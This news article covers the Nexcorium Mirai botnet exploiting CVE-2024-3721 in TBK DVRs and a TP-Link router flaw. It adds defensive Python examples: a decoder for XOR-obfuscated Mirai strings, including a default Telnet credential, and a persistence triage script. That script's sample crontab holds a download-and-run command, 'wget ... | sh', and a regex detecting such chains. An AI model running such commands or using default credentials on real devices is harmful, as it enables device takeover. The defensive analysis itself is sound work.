Nexcorium Variant of Mirai Botnet Exploits CVE-2024-3721 to Compromise TBK DVRs and Launch DDoS Attacks
Fortinet's FortiGuard Labs and Palo Alto Networks' Unit 42 have separately reported that attackers are exploiting vulnerabilities in TBK DVR devices and end-of-life (EoL) TP-Link Wi-Fi routers. On the TBK DVRs, the exploitation delivers variants of the Mirai botnet, among them a new one tracked as Nexcorium. The campaigns underscore the persistent exposure of Internet of Things (IoT) devices and the threat they pose once conscripted into botnets.
Understanding the Vulnerability
The TBK DVR attacks leverage CVE-2024-3721, a command injection vulnerability with a CVSS score of 6.3. Despite that medium severity rating, the flaw, which affects the TBK DVR-4104 and DVR-4216 models, gives attackers enough to deploy the Nexcorium variant of the Mirai botnet. Security researcher Vincent Li has noted that IoT devices are increasingly prime targets for large-scale attacks because of their widespread use, inadequate patching, and often weak security configurations.
Li emphasized that threat actors continue to exploit known vulnerabilities to gain initial access and deploy malware capable of persisting, spreading, and causing distributed denial-of-service (DDoS) attacks.
Historical Context of the Vulnerability
CVE-2024-3721 has a history of exploitation. Over the past year, it has been used to deploy various Mirai variants and a newer botnet called RondoDox. In September 2025, CloudSEK disclosed a large-scale loader-as-a-service botnet that distributed RondoDox, Mirai, and Morte payloads through weak credentials and outdated vulnerabilities in routers, IoT devices, and enterprise applications.
Exploitation of CVE-2024-3721 drops a downloader shell script that fetches and launches the botnet payload built for the Linux system's CPU architecture. Once executed, the malware prints a message indicating that "nexuscorp has taken control."
Technical Details of the Nexcorium Botnet
Nexcorium shares architectural similarities with previous Mirai variants, including XOR-encoded configuration table initialization, a watchdog module, and a DDoS attack module. To spread, it exploits CVE-2017-17215 against Huawei HG532 routers and uses a list of hard-coded usernames and passwords to brute-force Telnet logins on other devices.
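The XOR-encoded configuration table and hard-coded credential list above are the two Mirai traits an analyst most often has to peel back first. The following is an added example written for this page, not Fortinet's tooling and not Nexcorium's own code. It assumes the obfuscation scheme of the leaked Mirai source: every byte of an entry is XORed in turn with the four bytes of the 32-bit table key 0xDEADBEEF, which reduces to a single-byte XOR with 0x22. The article does not give Nexcorium's key, so the key is a parameter and a crib-based recovery routine is included for samples that use a different one. The sample entries are constructed here (well-known Mirai strings encoded with that key); the real Nexcorium table contents are not on the page.

```python
"""Decode Mirai-style XOR-obfuscated strings: configuration table entries and
the scanner's hard-coded Telnet credentials (added example, see lead-in)."""
from __future__ import annotations

MIRAI_TABLE_KEY = 0xDEADBEEF  # key from the leaked Mirai source; Nexcorium's is an unknown


def effective_xor_key(key32: int) -> int:
    """Fold a Mirai-style 32-bit key into the single byte it reduces to.

    Mirai's table.c applies k0, k1, k2, k3 to every byte in sequence; XOR is
    associative, so that is one XOR with k0 ^ k1 ^ k2 ^ k3 (0x22 for 0xDEADBEEF).
    """
    k0, k1, k2, k3 = key32.to_bytes(4, "big")
    return k0 ^ k1 ^ k2 ^ k3


def xor_bytes(data: bytes, key32: int = MIRAI_TABLE_KEY) -> bytes:
    """Apply the table XOR; it is symmetric, so this both encodes and decodes."""
    k = effective_xor_key(key32)
    return bytes(b ^ k for b in data)


def decode_entry(encoded: bytes, key32: int = MIRAI_TABLE_KEY) -> bytes:
    """Decode one table entry.

    Mirai stores the NUL terminator encoded too (0x22 under the default key),
    so the plaintext is everything before the first decoded NUL.
    """
    return xor_bytes(encoded, key32).split(b"\x00", 1)[0]


def recover_key_by_crib(blob: bytes, crib: bytes) -> list[int]:
    """Return every single-byte key under which `crib` appears in the decoded blob.

    For a variant that changed the key, strings such as b"/dev/watchdog",
    b"/proc/" or a known default credential make good cribs.
    """
    return [k for k in range(256) if crib in bytes(b ^ k for b in blob)]


# Constructed sample: Mirai table/credential strings encoded with key 0xDEADBEEF.
SAMPLE_ENTRIES = {
    "TABLE_MISC_WATCHDOG": b"\x0d\x46\x47\x54\x0d\x55\x43\x56\x41\x4a\x46\x4d\x45\x22",
    "TABLE_EXEC_SUCCESS": b"\x4e\x4b\x51\x56\x47\x4c\x4b\x4c\x45\x02\x56\x57\x4c\x12\x22",
    "TABLE_MISC_PROC": b"\x0d\x52\x50\x4d\x41\x0d\x22",
    "AUTH_USER": b"\x50\x4d\x4d\x56\x22",
    "AUTH_PASS": b"\x5a\x41\x11\x17\x13\x13\x22",
}


def decode_sample() -> dict[str, bytes]:
    """Decode every constructed entry with the default key."""
    return {name: decode_entry(enc) for name, enc in SAMPLE_ENTRIES.items()}


if __name__ == "__main__":
    for name, plain in decode_sample().items():
        print(f"{name:20s} {plain!r}")
    blob = b"".join(SAMPLE_ENTRIES.values())
    keys = recover_key_by_crib(blob, b"/dev/watchdog")
    print("candidate keys:", [hex(k) for k in keys])
```

In practice the blob handed to `recover_key_by_crib` is the raw bytes of the binary's table-initialization region (or the whole file); a thirteen-byte crib such as `/dev/watchdog` is long enough that a false-positive key is not a realistic concern, whereas a four-byte crib like `root` should be confirmed by decoding neighbouring entries.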
Once it obtains a shell on a target, the malware establishes persistence through crontab and a systemd service, then connects to its command-and-control server and waits for instructions to launch DDoS attacks over various protocols, including UDP, TCP, and SMTP. After persistence is in place, it deletes the downloaded binary from disk to hinder detection and analysis; the running process still holds the executable image, so a live system can be triaged before it is rebooted.
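The persistence behaviour described above (crontab entry, systemd service, binary unlinked after launch) is also what a defender can look for on a suspect device. The following is an added example written for this page, not tooling from Fortinet or Unit 42. The sample crontab, unit file and `/proc/<pid>/exe` link targets are constructed; the list of staging directories is an assumption drawn from common IoT botnet behaviour and is not something the article states.

```python
"""Triage checks for botnet-style persistence on a Linux device (added example)."""
from __future__ import annotations

import os
import re
from dataclasses import dataclass

# Directories a dropped payload is commonly executed from (assumption, tune per fleet).
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/", "/dev/")
# "wget ... | sh", "curl ...; chmod ..." and similar download-then-execute chains.
FETCH_AND_RUN = re.compile(r"\b(wget|curl|tftp|ftpget)\b[^|;&]*(\||;|&&)\s*(sh|bash|chmod)\b")


@dataclass(frozen=True)
class Finding:
    source: str
    item: str
    reason: str


def _cron_command(line: str) -> str | None:
    """Return the command part of a crontab line; None for comments, env assignments, junk."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):  # @reboot, @hourly, ...
        parts = line.split(None, 1)
        return parts[1] if len(parts) == 2 else None
    parts = line.split(None, 5)  # min hour dom mon dow command
    return parts[5] if len(parts) == 6 else None


def check_crontab(text: str, source: str = "crontab") -> list[Finding]:
    findings = []
    for line in text.splitlines():
        cmd = _cron_command(line)
        if cmd is None:
            continue
        if any(d in cmd for d in STAGING_DIRS):
            findings.append(Finding(source, line.strip(), "runs a binary from a staging directory"))
        if FETCH_AND_RUN.search(cmd):
            findings.append(Finding(source, line.strip(), "downloads and executes a payload"))
    return findings


def check_systemd_unit(text: str, source: str) -> list[Finding]:
    """Flag [Service] ExecStart lines that launch from a staging path or fetch-and-run."""
    section, restart, execs = None, "no", []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "Service" and "=" in line:
            key, _, value = line.partition("=")
            key, value = key.strip(), value.strip()
            if key in ("ExecStart", "ExecStartPre"):
                execs.append(value)
            elif key == "Restart":
                restart = value
    return [Finding(source, v, f"service starts from a staging path (Restart={restart})")
            for v in execs if any(d in v for d in STAGING_DIRS) or FETCH_AND_RUN.search(v)]


def deleted_exe_processes(exe_links: dict[int, str]) -> list[Finding]:
    """exe_links maps pid -> readlink('/proc/<pid>/exe').

    The kernel appends ' (deleted)' when the executable was unlinked after exec,
    which is exactly what a self-deleting bot leaves behind while it runs.
    """
    return [Finding(f"/proc/{pid}/exe", target, "process binary was deleted from disk")
            for pid, target in sorted(exe_links.items()) if target.endswith(" (deleted)")]


def read_proc_exe_links(proc_root: str = "/proc") -> dict[int, str]:
    """Collect exe links from a live system (root needed to read other users' processes)."""
    links = {}
    for name in os.listdir(proc_root):
        if name.isdigit():
            try:
                links[int(name)] = os.readlink(os.path.join(proc_root, name, "exe"))
            except OSError:  # kernel threads, exited or unreadable processes
                pass
    return links


# Constructed sample data (198.51.100.0/24 is a documentation range).
SAMPLE_CRONTAB = """\
# constructed sample
PATH=/usr/bin:/bin
*/5 * * * * /usr/bin/backup --quiet
@reboot /tmp/.x/nexus
*/10 * * * * wget -q http://198.51.100.7/bins.sh -O- | sh
"""
SAMPLE_UNIT = """\
[Unit]
Description=system helper
[Service]
ExecStart=/var/run/.sys/nexus
Restart=always
[Install]
WantedBy=multi-user.target
"""
SAMPLE_EXE_LINKS = {1: "/sbin/init", 412: "/usr/sbin/sshd", 2041: "/tmp/.x/nexus (deleted)"}


def triage_sample() -> list[Finding]:
    return (check_crontab(SAMPLE_CRONTAB) + check_systemd_unit(SAMPLE_UNIT, "nexus.service")
            + deleted_exe_processes(SAMPLE_EXE_LINKS))


if __name__ == "__main__":
    for f in triage_sample():
        print(f"{f.source}: {f.reason}: {f.item}")
```

On a live box, feed `check_crontab` the output of `crontab -l` for each user plus `/etc/crontab` and `/etc/cron.d/*`, `check_systemd_unit` each unit under `/etc/systemd/system`, and `deleted_exe_processes(read_proc_exe_links())` for the running processes; a hit from the last check can still be captured with `cp /proc/<pid>/exe` before the device is power-cycled.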
Fortinet has noted that the Nexcorium malware exhibits typical traits of modern IoT-focused botnets, combining vulnerability exploitation, support for multiple architectures, and various persistence methods to maintain long-term access to infected systems. The use of known exploits, such as CVE-2017-17215, along with extensive brute-force capabilities, highlights its adaptability and effectiveness in broadening its infection reach.
Ongoing Threats and Security Measures
Separately, Unit 42 has reported active, automated scans and probes attempting to exploit CVE-2023-33538, a command injection vulnerability in EoL TP-Link wireless routers. The vulnerability was added to the U.S. Cybersecurity and Infrastructure Security Agency's (CISA) Known Exploited Vulnerabilities (KEV) catalog in June 2025 and affects several TP-Link models, including TL-WR940N v2 and v4, TL-WR740N v1 and v2, and TL-WR841N v8 and v10.
Researchers Asher Davila, Malav Vyas, and Chris Navarrete have stated that the in-the-wild attempts they observed were flawed and would fail, but that their own analysis confirms the underlying vulnerability is real. Successful exploitation requires authentication to the router's web interface, so the practical exposure of a device comes down to whether its administrative credentials are still the factory defaults.
Recommendations for Users
Because the affected TP-Link devices are no longer supported and will not receive a fix, users are strongly advised to replace them with supported models and, in the meantime, to ensure that default credentials are not in use. As Unit 42 notes, default credentials remain a defining risk for IoT devices: they turn an authenticated, otherwise limited vulnerability into a critical entry point for an attacker.
Organizations and individuals must remain vigilant and proactive in addressing vulnerabilities in IoT devices. The exploitation of CVE-2024-3721 by the Nexcorium variant is a stark reminder of the ongoing challenges in securing interconnected devices.
For further insights, refer to the original reporting source: cyberwarriorsmiddleeast.com.
Published on 2026-04-18 21:20:00 • By FAME Delivered News Desk
